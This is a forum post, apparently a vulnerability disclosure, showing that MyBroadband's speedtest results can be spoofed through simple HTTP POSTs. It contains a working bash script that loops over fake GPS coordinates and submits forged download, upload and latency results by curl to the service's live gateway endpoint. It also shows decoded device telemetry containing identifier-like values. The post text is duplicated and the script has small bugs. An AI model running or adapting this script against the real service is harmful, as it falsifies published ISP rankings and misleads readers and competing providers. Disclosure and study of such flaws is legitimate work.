Mr Scratch
Expert Member
- Joined
- May 15, 2013
- Messages
- 4,872
- Reaction score
- 1,040
Hey there,
I was going to write a better post, but I'm busy so I decided to just post what I had written so far.
MyBroadband's current system of measuring speedtests, which are then used as analytics data for their various partners can easily be spoofed.
(1)
MyBroadband's system uses a simple HTTP request to post the data from the client device to their analytics server.
(1.1)
The desktop platform, found here: http://speedtest.mybroadband.co.za uses the following:
This will query the current speedtest ID, which can be popped into
The above is where things gets tasty (I chose to remove some information). I can simply edit the above data, and POST it, creating a valid result, which will then be used as part of the next "Top ISP blah blah" article. The same can be done for MyBroadband's mobile apps on iOS and Android - both on WiFi and cellular. Continue reading.
(1.2)
On the mobile apps, I can spoof both connection information, and geographic information.
The encoded part in bold can be decoded to:
From the above, run on an Android test device, we can see that they collect information about the device's SIM network, current network, device name and hardware, OS version, app version, server used, and location information. Which can all be spoofed.
(2)
MyBroadband publishes their analytics data, sourced from the speedtest system, on their news site. This can potentially be abused by network operators or ISPs to improve their own image, or damage the image of their competitors.
I was going to write a better post, but I'm busy so I decided to just post what I had written so far.
MyBroadband's current system of measuring speedtests, which are then used as analytics data for their various partners can easily be spoofed.
(1)
MyBroadband's system uses a simple HTTP request to post the data from the client device to their analytics server.
(1.1)
The desktop platform, found here: http://speedtest.mybroadband.co.za uses the following:
This will query the current speedtest ID, which can be popped into
to view the current and all previous tests.
The above is where things gets tasty (I chose to remove some information). I can simply edit the above data, and POST it, creating a valid result, which will then be used as part of the next "Top ISP blah blah" article. The same can be done for MyBroadband's mobile apps on iOS and Android - both on WiFi and cellular. Continue reading.
(1.2)
On the mobile apps, I can spoof both connection information, and geographic information.
Code:
#!/bin/bash
###############
#Generate spoofed GPS data from: http://www.geomidpoint.com/random/ in tab separated format and paste into geo_raw.txt
#awk '{print $2 " " $4}' geo_raw.txt > geo_data.txt
#Now geo_data.txt has $latitude $longitude formatted data
################
spoofedAccuracy="3"
spoofedDevice="iPhone X (GSM)"
while read -r geoData
do
clear
spoofedLatitude=$(echo $geoData | awk '{print $1}')
spoofedLongitude=$(echo $geoData | awk '{print $2}')
spoofedHash=$(date +%s | md5sum | awk '{print $1}')
spoofedDownload=$(( ( RANDOM % 50000 ) + 1 ))
spoofedUpload=$(( ( RANDOM % 50000 ) + 1 ))
spoofedLatency=$(( ( RANDOM % 20 ) + 1 ))
curl -i -s -k -X $'POST' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: okhttp/3.6.0' --data-binary $'action=result&ccode=za&longitude='$spoofedLongitude'&latitude=-'$spoofedLongitude'&accuracy=3&coordinates_mode=1&latency='$spoofedLatency'&download='$spoofedDownload'&upload='$spoofedUpload'&data_download=1654716&data_upload=34850&legacy=0&threads=10&misc=[B]%7B%221%22%3A%22357665058790519%22%2C%222%22%3A%22655020004420395%22%2C%223%22%3A%228ta%22%2C%224%22%3A%2265502%22%2C%225%22%3A%22za%22%2C%226%22%3A%22TelkomSA%22%2C%227%22%3A%2265502%22%2C%228%22%3A%22za%22%2C%2221%22%3A-127%2C%2222%22%3A%22Rockchip%22%2C%2223%22%3A%22H81930I%22%2C%229%22%3A56021515%2C%2210%22%3A2143813%2C%2211%22%3A19441912%2C%2212%22%3A441728%2C%2213%22%3A36579603%2C%2214%22%3A1702085%2C%2215%22%3A101%2C%2216%22%3A79732%2C%2245%22%3A309%2C%2226%22%3A-91%2C%2227%22%3A11%2C%2225%22%3A15%2C%2228%22%3A0%2C%2229%22%3A0%2C%2230%22%3A0%2C%2231%22%3A0%2C%2232%22%3A392568%2C%2233%22%3A118360%2C%2234%22%3A62328266%2C%2235%22%3A3023165%2C%2224%22%3A%22102.249.53.117%22%2C%2238%22%3A%225.1.1%22%2C%2239%22%3A%220%22%2C%2240%22%3A-1%2C%2241%22%3A-1%2C%2242%22%3A2%2C%2243%22%3A14%2C%2244%22%3A21%2C%2248%22%3A%221.4.1.0%22%2C%2249%22%3A%221%22%2C%2250%22%3A%22Auto%20select%20server%22%2C%2251%22%3A15%2C%2253%22%3A14%2C%2236%22%3A400%2C%2237%22%3A10118325246%7D&hash=7ebcfc2f827f36d83585e377011df1d5' [/B]$'http://speedtest.mybroadband.co.za/apps/gateway.php'
echo $spoofedDownload
echo $spoofedUpload
echo $spoofedLatency
done < geo.txt
done;The encoded part in bold can be decoded to:
Code:
{"1":"357665058790519","2":"655020004420395","3":"8ta","4":"65502","5":"za","6":"TelkomSA","7":"65502","8":"za","21":-127,"22":"Rockchip","23":"H81930I","9":56021515,"10":2143813,"11":19441912,"12":441728,"13":36579603,"14":1702085,"15":101,"16":79732,"45":309,"26":-91,"27":11,"25":15,"28":0,"29":0,"30":0,"31":0,"32":392568,"33":118360,"34":62328266,"35":3023165,"24":"102.249.53.117","38":"5.1.1","39":"0","40":-1,"41":-1,"42":2,"43":14,"44":21,"48":"1.4.1.0","49":"1","50":"Auto select server","51":15,"53":14,"36":400,"37":10118325246}From the above, run on an Android test device, we can see that they collect information about the device's SIM network, current network, device name and hardware, OS version, app version, server used, and location information. Which can all be spoofed.
(2)
MyBroadband publishes their analytics data, sourced from the speedtest system, on their news site. This can potentially be abused by network operators or ISPs to improve their own image, or damage the image of their competitors.
